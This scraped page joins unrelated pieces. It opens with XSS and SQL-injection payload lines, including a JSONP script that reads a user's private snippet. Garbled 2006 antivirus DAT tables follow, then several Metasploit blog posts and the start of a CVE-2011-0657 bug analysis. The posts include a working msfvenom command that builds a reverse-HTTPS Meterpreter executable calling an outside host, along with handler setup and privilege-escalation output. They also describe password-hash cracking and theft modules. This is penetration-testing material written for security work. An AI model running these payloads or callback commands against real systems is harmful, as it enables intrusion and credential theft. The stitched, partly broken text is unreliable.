<script>alert('0wn3d')</script>
<a href=”javascript:alert(‘0wn3d’)”>Click here to see a kitten</a>
<script>function _feed(s) {alert("Your private snippet is: " + s['private_snippet']);}</script><script src="http://google-gruyere.appspot.com/611788451095/feed.gtl"></script>
JohnDoe’; DROP TABLE members;--
DAT Version: | 4758 |
DAT Release Date: | 5-9-2006 |
Threats Detected: | 189,357 |
New Detections: | 14 |
Enhanced Detections: | 83 |
Name | Corporate Risk Assessment | Home Risk Assessment | ||||
X97F/Yagnuul.gen |
|
|
DAT Version: | 4757 |
DAT Release Date: | 5-8-2006 |
Threats Detected: | 18,9236 |
New Detections: | 21 |
Enhanced Detections: | 260 |
New Detections | Enhanced detections | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4756 |
DAT Release Date: | 5-5-2006 |
Threats Detected: | 189,044 |
New Detections: | 0 |
Enhanced Detections: | 17 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||
None :D |
|
DAT Version: | 4771 |
DAT Release Date: | 5-26-2006 |
Threats Detected: | 192,871 |
New Detections: | 6 |
Enhanced Detections: | 145 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4770 |
DAT Release Date: | 5-25-2006 |
Threats Detected: | 192,769 |
New Detections: | 15 |
Enhanced Detections: | 147 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4769 |
DAT Release Date: | 5-24-2006 |
Threats Detected: | 192,662 |
New Detections: | 20 |
Enhanced Detections: | 181 |
New Detections | Enhanced detections | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4768 |
DAT Release Date: | 5-23-2006 |
Threats Detected: | 192,370 |
New Detections: | 9 |
Enhanced Detections: | 92 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4767 |
DAT Release Date: | 5-22-2006 |
Threats Detected: | 192,152 |
New Detections: | 20 |
Enhanced Detections: | 214 |
New Detections | Enhanced detections | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4766 |
DAT Release Date: | 5-19-2006 |
Threats Detected: | 191,789 |
New Detections: | 6 |
Enhanced Detections: | 114 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4765 |
DAT Release Date: | 5-18-2006 |
Threats Detected: | 191,481 |
New Detections: | 13 |
Enhanced Detections: | 123 |
New Detections | Enhanced detections | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4764 |
DAT Release Date: | 5-17-2006 |
Threats Detected: | 190,899 |
New Detections: | 17 |
Enhanced Detections: | 121 |
Name | Corporate Risk Assessment | Home Risk Assessment | ||||
PWS-Poker |
|
|
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4763 |
DAT Release Date: | 5-16-2006 |
Threats Detected: | 190579 |
New Detections: | 15 |
Enhanced Detections: | 122 |
New Detections | Enhanced detections | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4762 |
DAT Release Date: | 5-15-2006 |
Threats Detected: | 190,171 |
New Detections: | 11 |
Enhanced Detections: | 182 |
Name | Corporate Risk Assessment | Home Risk Assessment | ||||
W32/Hoots.worm |
|
|
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4760 |
DAT Release Date: | 5-11-2006 |
Threats Detected: | 189,590 |
New Detections: | 6/td> |
Enhanced Detections: | 72 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
DAT Version: | 4759 |
DAT Release Date: | 5-10-2006 |
Threats Detected: | 189,440 |
New Detections: | 6 |
Enhanced Detections: | 164 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
One of my key objectives for developing the new vSploit modules was to test network devices such as Snort. Snort or Sourcefire enterprise products are widely deployed in enterprises, so Snort can safely be considered the de-facto standard when it comes to intrusion detection systems (IDS). So much that even third-party intrusion detection systems often import Snort rules.
Organizations are often having a tough time verifying that their IDS deployment actually work as intended, which is why I created several vSploit modules to test whether Snort sensors are seeing certain traffic. Since vSploit modules were made to trigger Snort alerts, they don't obfuscate attacks to avoid detection.
However, not every rule is used in every environment. For example, if you aren't using Microsoft Frontpage on your network, you likely won't want to use Snort's Frontpage rules. On the other hand, if you are running Frontpage you may not want to try exploiting it because it may affect the production system. Because of Metasploit Framework's flexibility, you can use the vSploit Generic HTTP Server module to host a small web server that answers all testing requests, so production systems won't be affected.
You can run vSploit modules with a mix of Metasploit Framework, Metasploit Pro, and Metasploit Express, providing there is end-to-end network connectivity to the vSploit instances:
To try out the new vSploit modules, start up the vSploit Generic HTTP Server.
Then launch Frontpage-related attack attributes:
Verify that the packets are being transmitted in Wireshark:
Finally, verify that Snort IDS sees the activity:
Metasploit vSploit Modules will be released at DEFCON 19.
HDM recently added password cracking functionality to Metasploit through the inclusion of John-the-Ripper in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to facilitate JtR's usage in Framework and directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes in the database and passes them to the john binaries that are now (r13135) included in Framework via a generated PWDUMP-format file.
Several JtR modes are utilized for quick and targeted cracking. First, wordlist mode: The generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the Korelogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.
Once the initial wordlist bruting is complete, incremental bruting rules, aptly named All4 & Digits5, are used to brute force additional combinations. These rulesets are shown below and can be found in the same john.conf configuration file in the Framework.
Cracked values are appended to the wordlist as they're found. This is beneficial :
Finally, discovered username/password combinations are reported to the database and associated with the host / service.
Cracking modes:
--wordlist=<ourgenerated wordlist> --rules single --format=lm
--incremental=All4--format=lm
--incremental=Digits5--format=lm
--wordlist=<ourgenerated wordlist> --rules single --format=ntlm
--incremental=All4--format=ntlm
--incremental=Digits5--format=lm
Incremental Rulesets:
[Incremental:All4]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 4
CharCount = 95
[Incremental:Digits5]
File =$JOHN/digits.chr
MinLen = 1
MaxLen = 5
CharCount = 10
As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.
UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!
The Meterpreter payload within the Metasploit Framework (and used by Metasploit Pro) is an amazing toolkit for penetration testing and security assessments. Combined with the Ruby API on the Framework side and you have the simplicity of a scripting language with the power of a remote native process. These are the things that make scripts and Post modules great and what we showcase in the advanced post-exploit automation available today. Metasploit as a platform has always had a concept of an established connection equating to a session on a compromised system. Meterpreter as a payload has supported reverse TCP connections, bind shell listeners, transport over Internet Explorer using ActiveX controls (PassiveX),and more recently a HTTPS stager. This is finally changing.
Corporate egress filters are becoming tighter and the standard connect-back payload has become less useful for large-scale end-user phishing campaigns. The PassiveX payload worked well for specific versions of Internet Explorer, but is becoming harder to support due to version and platform differences. The HTTPS stager within Metasploit works, but only the first stage of the connection used the target's proxy settings and authentication; the second stage required a full persistent SSL connection from Meterpreter back to the attacking system.
Rob Fuller (who many know as mubix) was lamenting this state of affairs last Sunday and convinced me to actually do something about it. The result is native support for HTTP and HTTPS transports for the Meterpreter payload, available in the Metasploit Framework open source tree immediately. Our Metasploit Pro users will be able to take advantage of the new HTTPS stager for phishing campaigns once the code has gone through a full regression test. These payloads use the WinInet API and will leverage any proxy or authentication settings the user has configured for internet access. The HTTPS stager will cause the entire communication path to be encrypted through SSL.The HTTP stager, even without encryption, will still follow the HTTP protocol specification and allow the payload to breeze through protocol inspecting gateways.
These new stagers (reverse_http and reverse_https) are a drastic departure from our existing payloads for one singular reason; they are no longer tied to a specific TCP session between the target and the Metasploit user. Instead of a stream-based communication model, these stagers provide a packet-based transaction system instead. This mode matches the behavior of many malware families and botnets. The challenge with these payloads is identifying when the user is "done"; this is accomplished in three different ways:
1. The payload has a hard-coded expiration date stamped into it during the initial staging process. By default, this is one week from the current date (relative to the target). This prevents a forgotten session from connecting back indefinitely. You can control this setting through the SessionExpirationTimeout advanced option. Setting this value to 0 indicates that it should continue connecting back until the process is forcibly killed or the target is restarted.
2. The payload has a hard-coded keep-alive timeout stamped into it during the staging process. This tells the payload to shutdown on its own if it is unable to connect back for a specific number of seconds. By default this is 300 secoinds (5 minutes), but it can be changed by setting the SessionCommunicationTimeout parameter. Just like the SessionExpirationTimeout option,setting this to 0 will result in a session that will never timeout, which has some interesting uses, as described below.
3. Finally, the Meterpreter payload now exposes a shutdown API (core_shutdown). This is called automatically when the session is exited through the Metasploit Console. To avoid shutting down the payload but still exit the temporary session, use the detach command from the Meterpreter prompt. Keep in mind that if the SessionCommunicationTimeout is hit (5 minutes of not being able to reach a listening handler), the payload will terminate anyways. Setting this option to 0 and detaching the session will instruct the payload to keep reaching out until the SessionCommunicationTimeout is hit or the process is killed.
With the new behavior and the three termination options above, some new capabilities are exposed.
If you are conducting a penetration test in which the compromised target has spotty internet access, setting SessionCommunicationTimeout to 0 will ensure that your session will reattach whenever the target comes back online (as long as the handler is running). Even better, the target will use the currently configured proxy server and authentication settings to reach the Metasploit server. Rob Fuller tested the new payloads through TOR and the payload was able to keep a session alive even when the exit nodes were being changed and the TOR service was turned on and off. This level of resiliency previously required a payload to be written to disk, which goes against one of the core principals of the Metasploit design.
If you are conducting a penetration test and want to change the IP to which your incoming connections are received, just use a DNS name for LHOST and modify the DNS record as needed (set a low TTL). If the name does not resolve and the SessionCommunicationTimeout and SessionExpirationTimeout settings have not been reached, the payload will continue trying to resolve the name and connect back. The session will continue to follow DNS changes and IP changes on the target side.
The work that was done to support a transactional HTTP-based communication model can be easily extended to support other communication channels in the future. Communicating through IRC, using Pastebin documents, or really any other form of network communication is now relatively simple to implement. Malware, botnets, and backdoors are using increasingly sophisticated communication channels and it is about time that our security tools caught up.
The command line below will generate a Windows executable that uses the new HTTPS stager:
$ msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=consulting.example.org LPORT=4443 > metasploit_https.exe
This sequence of Metasploit Console commands will configure a listener to handle the requests:
$ ./msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST consulting.example.org
msf exploit(handler) > set LPORT 4443
msf exploit(handler) > set SessionCommunicationTimeout 0
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://consulting.example.org:4443/
[*] Starting the payload handler...
Running the executable on the target results in:
[*] 192.168.0.129:51375 Request received for /INITM...
[*] 192.168.0.129:51375 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51375) at 2011-06-29 02:43:55 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: Spine\HD
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > detach
[*] Meterpreter session 1 closed. Reason: User exit
At this point, we can close the Metasploit Console and bring it up at any time.
After running the handler again with the same parameters:
[*] 192.168.0.129:51488 Request received for /CONN_mmOJARwJFmHbqXKu/...
[*] Incoming orphaned session CONN_mmOJARwJFmHbqXKu, reattaching...
[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51488) at 2011-06-29 02:44:24 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
You can see that the session has maintained state even across different instances of Metasploit.
This concept applies to background tasks like the keystroke sniffer, network sniffer, and other fuctions that accumulate information in the background.
-HD
Sometimes little things can make a huge difference in usability -- the Metasploit Framework Console is a great interface for getting things done quickly, but so far, has been missing the capability to save command and module output to a file. We have a lot of small hacks that makes this possible for certain commands, such as the "-o" parameter to db_hosts and friends, but this didn't solve the issue of module output or general console logs.
As of revision r13028 the console now supports the spool command (similar to database consoles everywhere). This command accepts one parameter, the name of an output file. Once set, this will cause all console output to be shown on the screen and written to the file. Calling the spool command with the parameter "off" will disable the spool. Even better, this command opens the destination file in append-only mode, so you can add the following line to your ~/.msf3/msfconsole.rc to automatically log all of your output for the rest of time:
spool /home/<username>/.msf3/logs/console.log
Thanks to oorang3 on freenode for the suggestion. To access the new command, use the msfupdate command on Linux (or just "svn update") or the Metasploit Update link on Windows.
If you are running a version of the Metaspoit Framework that used one of the binary installers prior to 3.7.2, we strongly recommend upgrading to take advantage of the improved auto-update capabilities and dependency fixes in that release.
-HD
It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions.
Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaisance, more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, help simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.
All of that leads us to the Metasploit Framework version 4.0, released today.
To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:
In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.
Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect nor is it nearly as complete as the windows version, but many features already work.
Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.
Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.
It's that time again! The Metasploit team is proud to announce the immediate release of the latest version of the Metasploit Framework, 3.7.2. Today's release includes eleven new exploit modules and fifteen post modules for your pwning pleasure. Adding to Metasploit's well-known hashdump capabilities, now you can easily steal password hashes from Linux, OSX, and Solaris. As an added bonus, if any of the passwords were hashed with crypt_blowfish (which is the default on some Linux distributions) any time since 1998, they may be considerably easier to crack. For more cracking fun, Maurizio Agazzini and Mubix's hard work has paid off in a new cachedump module. As the name implies, cachedump allows you to steal Windows cached password hashes. They can't be used directly like those obtained with hashdump, but JtR can crack them. If cracking sounds hard regardless of 13 year old bugs and proprietary hash algorithms, you might be interested in the latest post modules from TheLightCosine: they steal passwords from several applications which conveniently store them for lazy users in what is equivalent to plaintext.
Metasploit gets better every day.
For more details about this release, see the 3.7.2 Release Notes
A few weeks ago the Metasploit team announced a bounty program for a list of 30 vulnerabilities that were still missing Metasploit exploit modules. The results so far have been extremely positive and I wanted to take a minute to share some of the statistics.
As of last night, there have been 27 participants in the bounty program resulting in 10 submissions, with 5 of those already comitted to the open source repository and the rest in varying states of completeness.
One vulnerability was proven to be incredibly difficult (and likely impossible) to exploit, as Joshua Drake writes in his extensive blog post about the research process. For those who haven't spent a week banging your head against a difficult bug, this post can give you an idea how much work is involved just to state whether or not a security flaw is exploitable. Microsoft bulletins tend to error on the side of exploitability even when there isn't direct evidence to make the case for code execution.
Christopher Mcbee (Hal) deserves recognition for being the first person to submit a module for the Siemens FactoryLink vulnerability.
Alino was not only the first person to claim a $500 bounty, but he also managed to complete a second bounty as well!
Not everything went according to plan; three participants gave up before the one week deadline, eleven folks were not able to submit something in time, and one was disqualified for attempting to submit a snippet of commercial code as their own. One thing has been clear though; the Metasploit Community includes some amazing exploit developers and has an energy level that is tough to find in any other area of information security. Since the bounty was announced we have seen a record level of new patches, modules, suggestions, and community participation in the development process.
The bounty program is still running until July 20th; if you haven't had a chance to look at the list, you are running out of time to claim an item before the final deadline. Thanks again to everyone who participated so far and keep the submissions coming!
-HD
After more than 30 days of hardcore and intense exploit hunting, the Metasploit Bounty program has finally come to an end. First off, we'd like to say that even though the Metasploit Framework has made exploit development much easier, the process is not always an easy task. We're absolutely amazed how hard our participants tried to make magic happen.
Often, the challenge begins with finding the vulnerable software. If you're lucky, you can find what you need from 3rd-party websites that mirror different versions of the application, or you can download the trial version from the vendor (that is, if the trial version is still vulnerable). If you can't find it this way, well, good luck getting your hands on it. This process alone can sometimes take more time than writing the exploit. Unfortunately, quite a few of our participants gave up at this phase.
The next thing you do is gather as much information as possible about the vulnerability (CVE, OSVDB, ZDI, mailing lists, blogs, vendor's bug tracking system, etc). Reverse engineer the protocol or file format you're working with, find the root-cause by using whatever techniques (patch diffing, source code auditing, fuzzing, injection, etc), and then try to trigger a crash... hopefully a good one. In two occasions, thanks to Joshua J. Drake, Jon Butler, and Carlos' reversing-fu, we found out that CVE-2011-0657 (MS11-030) and CVE-2011-1206 (IBM Tivoli LDAP) are most likely non-exploitable. Even if a vulnerability is not exploitable, the effort spent trying to exploit it is not wasted. Often times the experience of attempting a difficult exploit can be a great learning experience, and sharing that experience gives other people insight into the real impact of the vulnerability.
Once you have a nice crash, you try to exploit the bug and gain code execution. Exploitation is all about precision, and there are many things you have to consider to get reliable code execution, which means there are many ways you can fail: bad heap layout, overwrite a freed object with an incorrect size, some variable on the stack you forgot to account for, overwrite a RET address, SEH, or a ROP gadget with an address that changes with every install, every service pack, or every patch level, etc, etc. Sometimes, you don't even realize that until you start throwing the exploit against all your VMs. If that's the case, you go back and fix it... or worst case scenario, you rewrite four or five times just to get it right. And that sucks!
Keep in mind that all this hard work had to be done within one week, and many of the participants could only do it in their spare time. But of course, some lucky fews were blessed by other people from the security community with exploit writing, the Metasploit team also received assistance from fellow hackers with the vetting process. To those who helped, you know who you are -- THANK YOU!:-) But again, we would also like to thank the following people for participating, the amount of participation we saw was unexpected and greatly appreciated (for those who specified a nickname, that's the name you'll be listed here):
Lastly, as planned, we will move on to the paying phase. And for those who are going to Las Vegas for Black Hat / Defcon, we will see you there :-)
Early in the 3.x days, metasploit had support for using databases through plugins. As the project grew, it became clear that tighter database integration was necessary for keeping track of the large amount of information a pentester might encounter during an engagement. To support that, we moved database functionality into the core, to be available whenever a database was connected and later added postgres to the installer so that functionality could be used out of the box. Still, the commands for dealing with the database and information stored there were sort of second-class citizens, all beginning with a "db_" prefix. We recently addressed this issue for the upcoming 4.0 release.
Commands that query the database have lost their "db_" prefix, while those that deal with managing the DB itself have retained it. For example, "db_hosts" is now just "hosts" and "db_status" remains the same. The idea behind this change is that hosts (and other entities) don't really have anything to do with the database other than the fact that they are stored there. Additionally, the deprecated db_import_*, db_create, and db_destroy have been removed.
The remaining commands have been improved by expanding search abilities and standardizing option parsing. So where you previously had to type full IP addresses to list more than one host, now all commands that search the database take hosts in nmap host specification format, and all of them that deal with services can take ports similarly. Furthermore, the options have been standardized a bit so -p always means port, -s always means service name.
Example usage for the services command:
msf > services 192.168.1-10.1,3,5 -p 22-25,80,443,445 192.168.99.0/24
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.99.1 22 tcp ssh open
192.168.99.141 445 tcp smb open Windows XP Service Pack 2 (language: Unknown) (name:XP-SP2) (domain:WORKGROUP)
192.168.100.129 445 tcp smb open Unix Samba 3.4.7 (language: Unknown) (name:FOO) (domain:FOO)
msf >
The new changes also make it really easy to find services running on odd ports
msf auxiliary(ssh_version) > services -s ssh
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.17.134 21 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 22 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 23 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 80 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 443 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 1433 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 8080 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 8443 tcp ssh open SSH-2.0-OpenSSH_4.4
192.168.17.134 9022 tcp ssh open SSH-2.0-OpenSSH_4.4
msf >
An often requested feature is the ability to run a module against hosts in the database that match certain criteria. That is now possible for scanner modules with the hosts and services commands' new -R flag (and --rhosts) which sets RHOSTS to the list of hosts returned. If the result is more than 5 hosts, it makes options pretty hard to read, so Metasploit writes it out to a temporary file like so:
msf auxiliary(ssh_version) > services -s ssh --rhosts
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.87.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.87.119 22 tcp ssh open SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
192.168.87.122 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.87.126 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.140 22 tcp ssh open SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5
192.168.87.145 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
192.168.87.158 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.88.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.89.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.90.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.90.61 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu6
192.168.93.1 22 tcp ssh open SSH-2.0-dropbear_0.52
192.168.96.1 22 tcp ssh open SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7
192.168.96.134 22 tcp ssh open SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
192.168.98.131 22 tcp ssh open SSH-2.0-OpenSSH_5.1p1 FreeBSD-20080901
RHOSTS => file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS file:/tmp/msf-db-rhosts-20110722-19191-18zr3bq-0 yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 254 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
Another way to make dealing with all that data easier is through the use of workspaces. Workspaces have been around for awhile, but they are an underused feature that allows you to seperate hosts, credentials, etc. for each engagement into their own silo. Every piece of data that metasploit records is associated with the current workspace, so it's quite easy to keep related information together and segregate different engagements by switching workspaces.
The command by itself will list available workspaces, the current one marked with an asterisk:
msf > workspace
default
* engagement_A
engagement_B
engagement_C
the_whole_friggin_internet
You can change the current workspace with workspace <name>. For extra convenience, names are tab-completable, too. You can add new workspaces with -a or delete existing ones with -d. Note that -d assumes you really meant it and will happily delete the whole thing (including hosts, credentials, loot, and all) without prompting.
The journey from a glued-on appendage, to a main feature only used by db_autopwn, to a core feature integrated with the whole framework has been an adventure. I think the result is easier access to information, better seperation of that data, and a smoother, faster pentest.
It'll only be days until you can download the new Metasploit version 4.0!
The new version marks the inclusion of 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules, all added since the release of version 3.7.1 in May 2011. These additions include nine new SCADA exploits, improved 64-bit Linux payloads, exploits for Firefox and Internet Explorer, full-HTTPS and HTTP Meterpreter stagers, and post-exploitation modules for dumping passwords from Outlook, WSFTP, CoreFTP, SmartFTP, TotalCommander, BitCoin, and many other applications. All of these these improvements are available in all Metasploit editions - the free and open source Metasploit Framework, as well as the commercial editions Metasploit Pro and Metasploit Express.
As usual, we'll have several blog posts about developments to the Metasploit Framework in the coming weeks. In this post, I'd like to focus on some of the new features in the commercial editions. Metasploit Pro 4.0 is all about greater enterprise integration, cloud deployment options, and penetration testing automation. The best news for customers holding a valid license for Metasploit Express or Metasploit Pro: you’ll be able to upgrade free of charge. Here are some of the features in Metasploit Pro 4.0:
Make Metasploit Pro an integral part of your risk intelligence solution
Deploy Metasploit Pro in a way that works for you
Boost your penetration tests
Inform stakeholders and document compliance with updated reports
Other new features include
If you're a Metasploit Express customer and would like to know which of these features are included in your edition, please see the Metasploit Compare & Download page.
Metasploit 4.0 will be available for download in August 2011. If you can't wait that long, register for an exclusive sneak preview with HD Moore this Thursday to see the new Metasploit Pro 4.0 in action!
DAT Version: | 4761 |
DAT Release Date: | 5-12-2006 |
Threats Detected: | 189,692 |
New Detections: | 9 |
Enhanced Detections: | 73 |
New Detections | Enhanced detections | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
If you weren’t already aware, Rapid7 is offering a bounty for exploits that target a bunch of hand-selected, patched vulnerabilities. There are two lists to choose from, the Top 5 and the Top 25 . An exploit for an issue in the Top 5 list will receive a $500 bounty and one from the Top 25 list will fetch a $100 bounty. In addition to a monetary reward, a successful participant also gets to join the elite group of people that have contributed to Metasploit over the years. Their work will be immortally assimilated into the Framework, under BSD license, for all to see.
Despite the low value of the reward, I saw this as an opportunity to make a little extra cash and take a look a fairly challenging bug. I selected CVE-2011-0657 from the Top 5 due to my previous experience with the DNS protocol. After I claimed the bug, and checked that my name was safely in the table of players, I immediately began procrastinating.
Later that day, Jon Butler (@securitea) tweeted to the effect that he had been working on the bug. I replied, letting him know I was willing to collaborate and share the cash and glory. After discussing some logistics, Jon sent me his commented IDB of the old version of DNSAPI.dll from Windows 7 and a PoC based on Scapy. When I opened the IDB, Jon already had it pointed at the “_Dns_Ip4ReverseNameToAddress_A” function. It was well commented, but I quickly invoked the Hex-Rays decompiler and started analyzing the function. You can find the HTML output here. You probably want to keep it open in a new tab while you continue reading.
After doing some input validation, the string preceding “.in-addr.arpa” is copied into a local stack buffer on line 23. Inspecting the constraints showed that it isn’t possible to cause a buffer overflow at this point.
I read on and noticed that it was processing the local stack buffer in reverse. It starts with “v_suffix” on line 26 and looks to see if it points at a ‘.’ character. If the value ever points at the beginning of the buffer, processing is halted and the “v_return” value is written to the output “a_ret” pointer on line 49. This seems all well and good, or is it?
After looking for a few more minutes, I came to a realization. Here is an excerpt from the chat log with Jon.
(5:33:22 PM) jduck: hexrays shows two nested loops
(5:33:48 PM) jduck: while (1) { while (1) { --endptr; .... } ... --endptr; }
(5:33:55 PM) jduck: so it could double decrement
